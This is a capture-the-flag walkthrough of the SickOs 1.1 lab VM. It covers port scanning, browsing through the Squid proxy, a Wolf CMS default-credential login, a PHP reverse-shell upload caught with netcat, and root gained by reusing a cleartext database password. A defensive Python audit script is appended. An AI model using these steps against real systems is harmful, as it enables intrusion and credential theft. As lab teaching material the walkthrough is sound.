VulnHub machine pentest [SickOs-1-1]

Name

Name: SickOs: 1.1
Release date: 11 December 2015

Download

  • Download (Mirror): https://download.vulnhub.com/sickos/sick0s1.1.7z
  • Download (Torrent): https://download.vulnhub.com/sickos/sick0s1.1.7z.torrent

Description

Name........: SickOs1.1
Date Release: 11 Dec 2015
Author......: D4rk
Series......: SickOs
Objective...: Get /root/a0216ea4d51874464078c618298b1367.txt
Tester(s)...: h1tch1
Twitter.....: https://twitter.com/D4rk36
This CTF is an explicit analogy for how hacking tactics are carried out against a network in order to compromise it, in a safe environment. The VM is very similar to the labs encountered in the OSCP. The objective is to compromise the network/machine and obtain administrative root privileges on it.

File information:

FileName: sick0s1.1.7z
File Size: 652.52 MB
MD5: 396e46897c54da6ded6604b861c806b7
SHA1: 3578a10ba92f860c2f0d8934ec5a9bbffc4c7859

Virtual machine:

Format: 7z
Operating System: Ubuntu
Tested: VMware Workstation 11.0.0 build-2305329

Networking:

DHCP service: enabled
IP address: assigned automatically

Information gathering

Start with nmap

root@kali:~# nmap -sn -v 192.168.66.*
Nmap scan report for 192.168.66.13
Host is up (0.00011s latency).
MAC Address: 00:0C:29:A3:1D:35 (VMware)
root@kali:~# nmap -p- -sV -v 192.168.66.13
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
3128/tcp open http-proxy Squid http proxy 3.1.19
8080/tcp closed http-proxy
root@kali:~# nmap -p 22,3128,8080 -A -T4 -v 192.168.66.13 --script=vuln
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
3128/tcp open http-proxy Squid http proxy 3.1.19
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-server-header: squid/3.1.19
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| vulners:
| cpe:/a:squid-cache:squid:3.1.19:
| CVE-2016-4054 6.8 https://vulners.com/cve/CVE-2016-4054
| CVE-2016-4052 6.8 https://vulners.com/cve/CVE-2016-4052
| CVE-2016-4051 6.8 https://vulners.com/cve/CVE-2016-4051
| CVE-2014-7142 6.4 https://vulners.com/cve/CVE-2014-7142
| CVE-2014-7141 6.4 https://vulners.com/cve/CVE-2014-7141
| CVE-2016-4556 5.0 https://vulners.com/cve/CVE-2016-4556
| CVE-2016-4555 5.0 https://vulners.com/cve/CVE-2016-4555
| CVE-2016-10002 5.0 https://vulners.com/cve/CVE-2016-10002
| CVE-2012-5643 5.0 https://vulners.com/cve/CVE-2012-5643
|_ CVE-2016-4053 4.3 https://vulners.com/cve/CVE-2016-4053
8080/tcp closed http-proxy

During the nmap scan we saw that port 3128 is running a proxy, so the next step is to configure that proxy manually in Firefox: enter the VM's IP as the HTTP proxy with port 3128, as shown in the figure below:

Visit the robots.txt file, read its contents, and then go to the wolfcms directory it points to.

getshell

I did not know much about Wolf CMS, so I searched Google for the location of its admin page. Once the login page turned up on Google, open it. It asks for a username and password. By default the username and password are admin and admin; log into the admin console, then choose the Files tab and then the Upload file option.

Admin panel

http://192.168.66.13/wolfcms/?/admin/login

Credentials: admin/admin

Once inside, locate the upload point and upload php-reverse-shell.

Then request phpreverseshell in the browser while listening with nc on the Kali side, and the shell comes back:

root@kali:~# nc -lvp 5566
listening on [any] 5566 ...
192.168.66.13: inverse host lookup failed: Unknown host
connect to [192.168.66.6] from (UNKNOWN) [192.168.66.13] 44079
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
10:47:19 up 1:40, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ pwd
/

Privilege escalation

Check the /etc/passwd file

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false

The database username and password found in the configuration file under the web root are as follows:

$ pwd
/var/www/wolfcms
$ cat config.php
<?php

// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');

...

Looking through all the user entries it lists, you will notice that the user sickos has the value 1000:1000, meaning sickos is the first user created on the box. That smells like an account with root privileges, precisely because it is the first user. So use the discovered password john@123 to switch to the user sickos.

$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@SickOs:/var/www/wolfcms$ ls
ls
CONTRIBUTING.md composer.json docs index.php robots.txt
README.md config.php favicon.ico public wolf
www-data@SickOs:/var/www/wolfcms$ su sickos
su sickos
Password: john@123

sickos@SickOs:/var/www/wolfcms$ id
id
uid=1000(sickos) gid=1000(sickos) groups=1000(sickos),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),111(lpadmin),112(sambashare)
sickos@SickOs:/var/www/wolfcms$ whoami
whoami
sickos
sickos@SickOs:/var/www/wolfcms$ cd /root
cd /root
bash: cd: /root: Permission denied
sickos@SickOs:/var/www/wolfcms$ sudo -s
sudo -s
[sudo] password for sickos: john@123

root@SickOs:/var/www/wolfcms# id
id
uid=0(root) gid=0(root) groups=0(root)
root@SickOs:/var/www/wolfcms# whoami
whoami
root
root@SickOs:/var/www/wolfcms# cd /root
cd /root
root@SickOs:/root# ls
ls
a0216ea4d51874464078c618298b1367.txt
root@SickOs:/root# cat a0216ea4d51874464078c618298b1367.txt
cat a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying

At this point root privileges have been obtained and the flag has been read.
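As an added example (not part of the original write-up), here is a small Python audit that performs the same two checks from the defender's side: it lists the interactive local accounts in /etc/passwd (the "uid 1000 is the first user" heuristic used above), pulls the cleartext DB credentials out of Wolf CMS's config.php, and flags the root DB user plus the password-reuse risk that was chained into root. The sample inputs are constructed, abridged copies of the output shown above.

```python
import re

# Constructed sample input: abridged copies of the /etc/passwd lines and the
# config.php defines shown in the write-up above.
PASSWD = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/bin/sh
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false
"""
CONFIG_PHP = """<?php
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');
"""

NOLOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin"}
DEFINE_RE = re.compile(r"define\(\s*'(\w+)'\s*,\s*'([^']*)'\s*\)")


def interactive_accounts(passwd_text, min_uid=1000):
    """Human accounts (uid >= min_uid, not nobody, real shell), lowest uid first."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue  # skip blank or malformed lines
        name, uid, shell = fields[0], int(fields[2]), fields[6]
        if uid >= min_uid and uid != 65534 and shell not in NOLOGIN_SHELLS:
            found.append((name, uid, shell))
    return sorted(found, key=lambda acct: acct[1])


def wolfcms_db_settings(config_text):
    """Extract Wolf CMS define('KEY', 'value') pairs from config.php."""
    return dict(DEFINE_RE.findall(config_text))


def config_findings(settings, accounts):
    """Flag the two weaknesses the write-up chained: root DB user, reusable password."""
    findings = []
    if settings.get("DB_USER") == "root":
        findings.append("DB_USER is root: the web app holds full MySQL privileges")
    if settings.get("DB_PASS"):
        names = ", ".join(acct[0] for acct in accounts) or "no interactive accounts"
        findings.append(f"DB_PASS is cleartext in config.php; check it is not reused by: {names}")
    return findings
```

On a real host, feed it the contents of /etc/passwd and the CMS config file; the reuse check still has to be confirmed by hand (or via your password policy tooling), since the script only names the accounts worth checking.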

Other privilege escalation methods for reference

  • 2015-slickOs-1.1
  • write-up-sickos-1-1
  • vulnhub-writeup-SickOs-1-1

They use the ShellShock vulnerability together with an automated cron job to escalate privileges; it is straightforward, so it is not demonstrated here.

Key takeaways

  • Configuring the browser to access the target through the Squid HTTP proxy (http-proxy)
  • Weak passwords
  • File upload
  • A user with the value 1000:1000 is the first user: first-user privilege escalation

Game over

Sorry, this time I still could not find that Greek expert's idiot-proof one-click clear script, i am so sorry about this… It's a pity…

The end, to be continued…